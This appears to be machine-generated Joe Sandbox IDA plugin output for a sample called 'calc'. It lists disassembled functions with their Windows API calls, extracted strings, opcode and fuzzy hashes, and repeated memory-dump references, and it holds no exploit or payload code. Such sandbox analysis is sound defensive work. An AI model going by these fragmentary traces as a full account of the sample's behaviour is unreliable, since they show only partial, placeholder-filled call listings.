Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: Color$ModeObjectPixelStockText
String ID:
API String ID: 3335329649-0
Opcode ID: f119085c45a49c7da0f7156818a14affc38ae8097efda252f98faf3e6f8f3136
Instruction ID: cffc45891000b0bcc1ff650ca7b895da0922e0ac8dd974e18ebca7e1b207af5a
Opcode Fuzzy Hash: f119085c45a49c7da0f7156818a14affc38ae8097efda252f98faf3e6f8f3136
Instruction Fuzzy Hash: FA41E830104355BBDB345F289C5876E3B959F05321F16053BF563612E6DB3ACC669B0A

Function 00417905 Relevance: 12.0, APIs: 8, Instructions: 33COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32(?), ref: 00417916
VariantClear.OLEAUT32(?), ref: 0041791C
VariantClear.OLEAUT32(?), ref: 00417922
VariantClear.OLEAUT32(?), ref: 00417928
VariantClear.OLEAUT32(?), ref: 00417931
VariantClear.OLEAUT32(?), ref: 00417937
VariantClear.OLEAUT32(?), ref: 00417940
VariantClear.OLEAUT32(?), ref: 00417949

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: 7515e139fb4bb4e1bd99acf1861c07cc37c553c4cb4bd1ee9d3f4938d929fa9e
Instruction ID: fff72cd69ca82f6953f7f206462b4c09a392314aa2bc16a66ee90bf446161d79
Opcode Fuzzy Hash: 7515e139fb4bb4e1bd99acf1861c07cc37c553c4cb4bd1ee9d3f4938d929fa9e
Instruction Fuzzy Hash: 6DF0A9B6400B49AADB31E7B9DC48BC7B7EC6F85200F054D2AD696C3525DA78F189CB14

Function 004092FB Relevance: 10.9, APIs: 7, Instructions: 428COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: 51004693d88b0729752c3e2e6fd21d15dec76c629f8c13dc28b7f9a39be731a4
Instruction ID: 01edab73392a80d4103d92ff6f361a6a440f26f9ffb4b8913aacefb8a2784695
Opcode Fuzzy Hash: 51004693d88b0729752c3e2e6fd21d15dec76c629f8c13dc28b7f9a39be731a4
Instruction Fuzzy Hash: F3021476900208EFCF119F94C8409EE7BB5EF49314F15816AFA18B73A2C339AD51DB99

Function 0040C8FD Relevance: 10.7, APIs: 7, Instructions: 233COMMON

Download Yara Rule

APIs

Part of subcall function 0040CCF8: DeleteObject.GDI32(?), ref: 0040CD3D
Part of subcall function 0040CCF8: ExtCreatePen.GDI32(?,?,?,00000000,00000000,?,?), ref: 0040CD84
Part of subcall function 0040CCF8: SelectObject.GDI32(?,00000000), ref: 0040CD94
Part of subcall function 0040CCF8: BeginPath.GDI32(?), ref: 0040CDAE
Part of subcall function 0040CCF8: SelectObject.GDI32(?,00000000), ref: 0040CDCD

MoveToEx.GDI32(?,?,?,00000000), ref: 0040C9B0
AngleArc.GDI32(00000008,?,?,00000000,?,?), ref: 0040C9FD

Part of subcall function 0040CF77: MoveToEx.GDI32(?,00000000,00000001,00000000), ref: 0040CFC3
Part of subcall function 0040CF77: _logf.LIBCPMT ref: 0040CFD6
Part of subcall function 0040CF77: _logf.LIBCPMT ref: 0040CFF4
Part of subcall function 0040CF77: LineTo.GDI32(?,?,00000001), ref: 0040D010

LineTo.GDI32(00000008,?,?), ref: 0040CA0F
CloseFigure.GDI32(00000008), ref: 0040CA18
Ellipse.GDI32(?,?,?,?,?), ref: 0040CA6A
Rectangle.GDI32(?,?,?,?,?), ref: 0040CB28

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: Object$LineMoveSelect_logf$AngleBeginCloseCreateDeleteEllipseFigurePathRectangle
String ID:
API String ID: 2270488568-0
Opcode ID: 3e41277f35241731e5ecdc64cb86dd8e478581ef2b495140d12ab5893bf93d11
Instruction ID: b80d5d34312ecd98a02386c7250854dbc6076191505cc9a654b0a8d9ac695662
Opcode Fuzzy Hash: 3e41277f35241731e5ecdc64cb86dd8e478581ef2b495140d12ab5893bf93d11
Instruction Fuzzy Hash: 4B915C70900209EFDF11CFA8CC89AAEBBB5FF44314F14426AE815B62A1C739AD51DF58

Function 00409A3B Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 225COMMON

Download Yara Rule

APIs

GetClientRect.USER32(?,?), ref: 00409A8D
GetWindowRect.USER32(?,?), ref: 00409ABC
GetClientRect.USER32(00000400,?), ref: 00409B03
GetWindowRect.USER32(?,?), ref: 00409B4D
ScreenToClient.USER32(00000400,?), ref: 00409B72

Strings

`, xrefs: 00409C11

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: Rect$Client$Window$Screen
String ID: `
API String ID: 1296646539-2679148245
Opcode ID: 979626e2387a37fc5672180711e3e3b7af98162ae0c42364082c39fbb8a1b67d
Instruction ID: 5c22e1647285930d546eea6ccc3219bc4b63db07404db36e62ebad6edb330b87
Opcode Fuzzy Hash: 979626e2387a37fc5672180711e3e3b7af98162ae0c42364082c39fbb8a1b67d
Instruction Fuzzy Hash: 23917E79A00649EBDB14CFA8C5846AEFBF1FF48304F14452AD992B37A1D734AE40CB58

Function 004505A6 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 172COMMON

Download Yara Rule

APIs

GetStartupInfoA.KERNEL32(?), ref: 00450603
GetFileType.KERNEL32(?), ref: 004506AD
GetStdHandle.KERNEL32(-000000F6), ref: 0045072E

Strings

dH, xrefs: 00450640

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: FileHandleInfoStartupType
String ID: dH
API String ID: 2461013171-846699462
Opcode ID: 9a7947f9ad82b782c8fe595840faaf87bc5a92e1700e0f2174f3b348224a7055
Instruction ID: 571e7180ef913d33cbf7ce2b326ee305126e63e0fb4f845115fe28abbe455c90
Opcode Fuzzy Hash: 9a7947f9ad82b782c8fe595840faaf87bc5a92e1700e0f2174f3b348224a7055
Instruction Fuzzy Hash: D551E8791047418FC7248F28D8847267BE4FB55326F184A6ED9A6C72E3D738E85DCB09

Function 0042B114 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 156COMMON

Download Yara Rule

APIs

Part of subcall function 0042FE9D: LoadLibraryA.KERNEL32(Wininet.dll,0042A74E), ref: 0042FEA8
Part of subcall function 0042FE9D: GetProcAddress.KERNEL32(00000000,InternetOpenW), ref: 0042FEBA

FreeLibrary.KERNEL32(00000000,?,00000003), ref: 0042B198
FreeLibrary.KERNEL32(?,?,00000003), ref: 0042B2A5
FreeLibrary.KERNEL32(?,?,00000003), ref: 0042B2AF
FreeLibrary.KERNEL32(00000000,?,00000003), ref: 0042B2B9

Strings

<local>, xrefs: 0042B172
su, xrefs: 0042B198, 0042B29A

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: Library$Free$AddressLoadProc
String ID: <local>$su
API String ID: 1386263645-3415279360
Opcode ID: 32da04e832618fddd7a87dad8587297ad2d2ab068d8d49f6a0b5dfce77d14965
Instruction ID: 88fc05d2817ab47fd5b179a8d744bb7f0cbe5fd8e9c3f9efe6eed6e79e075052
Opcode Fuzzy Hash: 32da04e832618fddd7a87dad8587297ad2d2ab068d8d49f6a0b5dfce77d14965
Instruction Fuzzy Hash: 9F517D31A00239EBDF25DBA4EC89EEEB778FF09740F904566E414A2250C7346A54CBE9

Function 0042BE53 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 149COMMON

Download Yara Rule

APIs

Part of subcall function 0042EFD5: GetForegroundWindow.USER32(?), ref: 0042EFDB
Part of subcall function 0042EFD5: GetWindowRect.USER32(00000000,?), ref: 0042EFED

GetDesktopWindow.USER32 ref: 0042BE7A
GetWindowRect.USER32(00000000), ref: 0042BE81
mouse_event.USER32(00008001,?,00000001,00000000,00000000), ref: 0042BEB5

Part of subcall function 00415F9F: Sleep.KERNEL32(000000FA,00479E08,?,?,00420420,00479E08,00479E08,00000001,00000000,?,?,0042018E,?,00479E08), ref: 0041602B

GetCursorPos.USER32(?), ref: 0042BEDD
mouse_event.USER32(00008001,?,0000000B,00000000,00000000), ref: 0042BF9E

Strings

d, xrefs: 0042BECC

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
String ID: d
API String ID: 4137160315-2564639436
Opcode ID: a7507ff59d1f84e5e95a0c053b09d558c46e193066ca54b7beac4dc000bdcc94
Instruction ID: 1eca856535500a1089d069f95856a78e939d7b0643273a579d4f7235f62430b1
Opcode Fuzzy Hash: a7507ff59d1f84e5e95a0c053b09d558c46e193066ca54b7beac4dc000bdcc94
Instruction Fuzzy Hash: 004117727007269BDF208FA9AD84BAE73A5EB44304F52853BF914D7281D778DC818BD8

Function 0040BD45 Relevance: 10.6, APIs: 7, Instructions: 144windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040BDCA
SendMessageW.USER32(?,0000104D,00000000,00000005), ref: 0040BE1A
SendMessageW.USER32(?,00001008,00000001,?), ref: 0040BEF5

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: e9270b8b6bc2db239543e4602c2bc6c82faa1196c29a7e750817dcbcaf1047de
Instruction ID: c9dee8523dbd2f001bbba7f2df5488a07f0ddf073e31d2c7163cdd95c91364d6
Opcode Fuzzy Hash: e9270b8b6bc2db239543e4602c2bc6c82faa1196c29a7e750817dcbcaf1047de
Instruction Fuzzy Hash: EA514B71900218AFDF11DF94CD41BEE7BB5EF09314F1041A6EA10BB2A1D774AA45DB98

Function 00420ACC Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 133COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(00000000,?,@GUI_CTRLID,?,00479E08,?,?,0042018E,?,00479E08,00479E08,00479E08), ref: 00420B68
CharUpperBuffW.USER32(004203AA,00479E08,@GUI_WINHANDLE,?,0047BD20,00000000,?), ref: 00420BA5
CharUpperBuffW.USER32(?,?,@GUI_CTRLHANDLE,?,0047BD20,004203AA,?), ref: 00420BE2

Strings

@GUI_CTRLID, xrefs: 00420B4F
@GUI_WINHANDLE, xrefs: 00420B92
@GUI_CTRLHANDLE, xrefs: 00420BCF

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: BuffCharUpper
String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE
API String ID: 3964851224-758534266
Opcode ID: dcddbf6780367992d8c96736425c50bb8195540fba5c9a78a0d50570f2b70651
Instruction ID: 0670a5c02a3ad987be2aa7fb96b886d40dde11566c37022459f53628aa54ba14
Opcode Fuzzy Hash: dcddbf6780367992d8c96736425c50bb8195540fba5c9a78a0d50570f2b70651
Instruction Fuzzy Hash: 8941B67194012CABCF21EBA6DD45AEE7BB9EF04304F24016BF805B7122CB796D46DB64

Function 00409F29 Relevance: 10.6, APIs: 7, Instructions: 126windowCOMMON

Download Yara Rule

APIs

ShowWindow.USER32(?,00000000), ref: 00409FCA
ShowWindow.USER32(?,00000005,?,00000000), ref: 00409FD0
SetFocus.USER32(?,?,00000000), ref: 00409FDC
SendMessageW.USER32(?,00002001,00000000,?), ref: 00409FF9

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: ShowWindow$FocusMessageSend
String ID:
API String ID: 3348785246-0
Opcode ID: 2912cf3291633da9375a316781e2fed9097f96e5693141c9d4bec574df01d53a
Instruction ID: 1f5e4ee820ca1ad8d5727451a42756ae35113e362d004ced1041d4ab6605815b
Opcode Fuzzy Hash: 2912cf3291633da9375a316781e2fed9097f96e5693141c9d4bec574df01d53a
Instruction Fuzzy Hash: A641D73140030CBBDF319F24CC89E6E7BA4AB45351F24453BFA42FA2E1D679ED519A4A

Function 0040BBDB Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 120windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001036,00000000,?), ref: 0040BC75
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 0040BC8B
SendMessageW.USER32(?,00001057,00000000,?), ref: 0040BCE9
SendMessageW.USER32(?,00001061,00000000,0000000F), ref: 0040BD1B

Strings

-----, xrefs: 0040BCCA
SysListView32, xrefs: 0040BC4B

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: MessageSend$Window
String ID: -----$SysListView32
API String ID: 2326795674-3975388722
Opcode ID: 1c9563f93ac8fc5db84832b05a3869965d429622ca7a67e34f73cff828012fcc
Instruction ID: ec6a700272040e40e92a54c56fa040193a127b838e178095dd06ae8a84f88c0f
Opcode Fuzzy Hash: 1c9563f93ac8fc5db84832b05a3869965d429622ca7a67e34f73cff828012fcc
Instruction Fuzzy Hash: 86415871800209EBDF219F68C845ADE7BB9EB19358F01016BF948B6292C779D944CF98

Function 0040B7B2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,?,00000000,0000002C), ref: 0040B82D
IsMenu.USER32(?), ref: 0040B840
CreatePopupMenu.USER32 ref: 0040B84A
InsertMenuItemW.USER32(?,?,00000001,0000002C), ref: 0040B880
DrawMenuBar.USER32(?), ref: 0040B888

Strings

,, xrefs: 0040B7C4

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: Menu$Item$CreateDrawInfoInsertPopup
String ID: ,
API String ID: 2727366139-3772416878
Opcode ID: 5bda6680cf02f1709b1c8040744c8a64ce94f6e4f8689a38d774f8be7eb7a155
Instruction ID: 73ffb52debe41e485c73ce9743448b5bc55771eeef5cff0f8f225e8659b42da2
Opcode Fuzzy Hash: 5bda6680cf02f1709b1c8040744c8a64ce94f6e4f8689a38d774f8be7eb7a155
Instruction Fuzzy Hash: DF318C76900208EFDF10DF54D984ADABBB9FF48304F10816AE911AB3A1D735ED05DB98

Function 0040B225 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 0040B28B
SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0040B29A
SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0040B2A5
SendMessageW.USER32(?,00000401,00000000,00640000), ref: 0040B2B4
SendMessageW.USER32(?,00000404,00000001,00000000), ref: 0040B2C0

Strings

Msctls_Progress32, xrefs: 0040B262

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: MessageSend
String ID: Msctls_Progress32
API String ID: 3850602802-3636473452
Opcode ID: 937d72351a3cffb958232a75d02b7208b3851732dd46308458e1c1bc3b089544
Instruction ID: 52bfa3c8ca57206c5aefe15543c0d5c9767dcfa2ca37888765e00b3bca3ed78b
Opcode Fuzzy Hash: 937d72351a3cffb958232a75d02b7208b3851732dd46308458e1c1bc3b089544
Instruction Fuzzy Hash: C6114CB150020DBFEF119F51CC85EDA7F69EB083A8F11416AFA18361E1C7769C61DB98

Function 00414469 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 52windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,00000000,?,00000100,?,0045C6D0), ref: 0041448D
LoadStringW.USER32(00000000), ref: 00414496
GetModuleHandleW.KERNEL32(00000000,00000000,?,00000100), ref: 004144A5
LoadStringW.USER32(00000000), ref: 004144A8
MessageBoxW.USER32(0047BD30,?,?,00011010), ref: 004144EF

Strings

%s (%d) : ==> %s: %s %s, xrefs: 004144CA

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: HandleLoadModuleString$Message
String ID: %s (%d) : ==> %s: %s %s
API String ID: 4072794657-3128320259
Opcode ID: 03e62e4c2e52b1cd091c8559f5e88ecf3355c8990eab41007b3b5120228d8c5d
Instruction ID: f482db0144711750f8ad3975750deea825f68ac064d00ccfce29163d0917d0ef
Opcode Fuzzy Hash: 03e62e4c2e52b1cd091c8559f5e88ecf3355c8990eab41007b3b5120228d8c5d
Instruction Fuzzy Hash: C8017CF690021DBBEB11AB94DD45FEB77ACEB48345F0040A2BB04E6081D6749E898BB4

Function 00412305 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51fileCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?,?,?,00000000,00402A3C,?,00000406,00000000,00000000), ref: 00412333
UnmapViewOfFile.KERNEL32(?,?,?,00000000,00402A3C,?,00000406,00000000,00000000), ref: 0041234B
CloseHandle.KERNEL32(?,?,?,00000000,00402A3C,?,00000406,00000000,00000000), ref: 00412354
FreeLibrary.KERNEL32(?,?,?,00000000,00402A3C,?,00000406,00000000,00000000), ref: 0041236E
FreeLibrary.KERNEL32(?,?,?,00000000,00402A3C,?,00000406,00000000,00000000), ref: 00412377

Strings

su, xrefs: 00412365

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
